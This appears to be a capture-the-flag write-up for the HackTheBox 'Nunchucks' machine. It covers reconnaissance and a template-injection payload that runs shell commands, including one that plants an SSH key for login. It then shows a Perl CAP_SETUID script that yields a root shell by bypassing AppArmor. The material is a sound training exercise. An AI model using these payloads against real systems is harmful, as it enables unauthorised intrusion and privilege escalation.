Nunchucks - Easy

Introduction@Nunchucks:~$

Name

Nunchucks

10.10.11.122

Points

Linux

Difficulty

Easy

Creator

TheCyberGeek

Release Date

02 / Nov / 2021

Recon

Nmap

┌─[sheinn101@parrot]─[~/htb/nunchucks]
└──╼ [??]$ cat nmap.out 
# Nmap 7.92 scan initiated Wed Nov  3 15:20:27 2021 as: nmap -sC -sV -oN nmap.out 10.10.11.122
Nmap scan report for 10.10.11.122
Host is up (0.42s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6c:14:6d:bb:74:59:c3:78:2e:48:f5:11:d8:5b:47:21 (RSA)
|   256 a2:f4:2c:42:74:65:a3:7c:26:dd:49:72:23:82:72:71 (ECDSA)
|_  256 e1:8d:44:e7:21:6d:7c:13:2f:ea:3b:83:58:aa:02:b3 (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://nunchucks.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_http-trane-info: Problem with XML parsing of /evox/about
| tls-nextprotoneg: 
|_  http/1.1
| ssl-cert: Subject: commonName=nunchucks.htb/organizationName=Nunchucks-Certificates/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:localhost, DNS:nunchucks.htb
| Not valid before: 2021-08-30T15:42:24
|_Not valid after:  2031-08-28T15:42:24
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov  3 15:21:19 2021 -- 1 IP address (1 host up) scanned in 52.42 seconds

Only 3 Ports are opened and we can see a DNS name nunchucks.htb. So add our /etc/hosts

echo 10.10.11.122 nunchucks.htb | sudo tee -a /etc/hosts

Web

I tried directory bruteforce but noting interesting. There is also a signup page which is currently closed. So noting much we can do. Let's find vhosts for this.

Finding Vhosts

┌─[sheinn101@parrot]─[~/htb/nunchucks]
└──╼ [??]$ ffuf -u https://FUZZ.nunchucks.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : https://FUZZ.nunchucks.htb
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

store                   [Status: 200, Size: 4029, Words: 1053, Lines: 102]

Found a subdomain called store.nunchucks.htb . Add this again to /etc/hosts

If we go this domain, we can see another web page running Express which is Javascript Framework.

When we enter an email and click on Notify Me , It will reflected a message to us.

So I tried SSTI like this.

Now we can confirmed there is Server Site Template Injection .

After wasting some times in google , I found a website that we can get code execution for Nunchucks Template Engine.

Nunchucks

Intercept with Burp and enter payload like this

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}@gmail.com

Note: if you copy from original website, don't forget to esacpe double quote.

Now we get the content of /etc/passwd .

Getting User David

I generate ssh-key with ssh-keygen in my localhost.

┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh]
└──╼ [??]$ ssh-keygen -f david
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in david
Your public key has been saved in david.pub
The key fingerprint is:
SHA256:zhOVx8gBnLp4OWrXr3ErJzzFxCnmWguQqm/jIRMpSOk sheinn101@parrot
The key's randomart image is:
+---[RSA 3072]----+
|       ..o.      |
|  .     o. =     |
| o   . . .=.o    |
|+.  o . o.+.     |
|=E . o =S+       |
|... . *oo.o      |
|o..  o B=o.      |
|.oo.o o B+..     |
| +oo .  .Bo      |
+----[SHA256]-----+

Put it our ssh public key to /home/david/.ssh/authorized_keys.

{"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo "YOUR SSH PUBLIC KEY" > /home/david/.ssh/authorized_keys')\")()}}@gmail.com"}

And then we can login with ssh.

┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh]
└──╼ [??]$ ssh -i david david@10.10.11.122
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-86-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon  8 Nov 05:50:27 UTC 2021

  System load:  0.0               Processes:               230
  Usage of /:   48.8% of 6.82GB   Users logged in:         0
  Memory usage: 48%               IPv4 address for ens160: 10.10.11.122
  Swap usage:   0%


10 updates can be applied immediately.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Oct 22 19:09:52 2021 from 10.10.14.6
david@nunchucks:~$ ls
user.txt
david@nunchucks:~$ cat user.txt
d5beec8da1********65e4f46a2a6a
david@nunchucks:~$

Privilege Escalaption

After some enumerating, there is some interesting file in /opt directory

david@nunchucks:/opt$ ls -al
total 16
drwxr-xr-x  3 root root 4096 Oct 28 17:03 .
drwxr-xr-x 19 root root 4096 Oct 28 17:03 ..
-rwxr-xr-x  1 root root  838 Sep  1 12:53 backup.pl
drwxr-xr-x  2 root root 4096 Oct 28 17:03 web_backups
david@nunchucks:/opt$

backup.pl

#!/usr/bin/perl
use strict;
use POSIX qw(strftime);
use DBI;
use POSIX qw(setuid); 
POSIX::setuid(0); 

my $tmpdir        = "/tmp";
my $backup_main = '/var/www';
my $now = strftime("%Y-%m-%d-%s", localtime);
my $tmpbdir = "$tmpdir/backup_$now";

sub printlog
{
    print "[", strftime("%D %T", localtime), "] $_[0]\n";
}

sub archive
{
    printlog "Archiving...";
    system("/usr/bin/tar -zcf $tmpbdir/backup_$now.tar $backup_main/* 2>/dev/null");
    printlog "Backup complete in $tmpbdir/backup_$now.tar";
}

if ($> != 0) {
    die "You must run this script as root.\n";
}

printlog "Backup starts.";
mkdir($tmpbdir);
&archive;
printlog "Moving $tmpbdir/backup_$now to /opt/web_backups";
system("/usr/bin/mv $tmpbdir/backup_$now.tar /opt/web_backups/");
printlog "Removing temporary directory";
rmdir($tmpbdir);
printlog "Completed";

This script is seem like to backup files into web_backups directory which is owned by root.

It' s also using POSIX::setuid(0); to run as root but It must be SUID or capability.

As a linpeas output ,we can see it has CAP_SETUID.

CAP_SETUID is granted to programs running as root or those running as a non-root user that have been explicitly given the CAP_SETUID runtime capability.It is often preferable to use Linux runtime capabilities rather than file capabilities, since using file capabilities to run a program with elevated privileges opens up possible security holes since any user with access to the file can exec() that program to gain the elevated privileges.

You can also check wit this command : getcap -r / 2>/dev/null

GTFObin

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

I run this one line command from GTFObin but it not worked.When we try to run whoami

It will return as root, we can't even read root.txt , it said permission denied.

david@nunchucks:/opt$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
root
david@nunchucks:/opt$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "cat /root/root.txt";'
cat: /root/root.txt: Permission denied
david@nunchucks:/opt$

But when we create this one line command into a script and run it.

david@nunchucks:/tmp$ cat pwned.pl 
#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/bash";

david@nunchucks:/tmp$ chmod +x pwned.pl 
david@nunchucks:/tmp$ ./pwned.pl 
root@nunchucks:/tmp# id
uid=0(root) gid=1000(david) groups=1000(david)
root@nunchucks:/tmp# cat /root/root.txt
cf715d729***********b1aac2ebdd9e

Now we get a shell as root.

Note: But we can' execute like this. It said permission denied.

david@nunchucks:/tmp$ perl pwned.pl 
Can't open perl script "pwned.pl": Permission denied
david@nunchucks:/tmp$

This is weird. I tried to search on Google and I found an Article about this. If a script including the shebang of the restricted application is used, then the script will not be allocated the same restrictions and will be executed as shown in the link. Knowing that we can execute scripts with the shebang and they won't apply the AppArmor profile to the script. That's it.

Author Account : https://app.hackthebox.com/profile/237587

PreviousHackTheBox NextBountyHunter - Easy

Last updated 4 years ago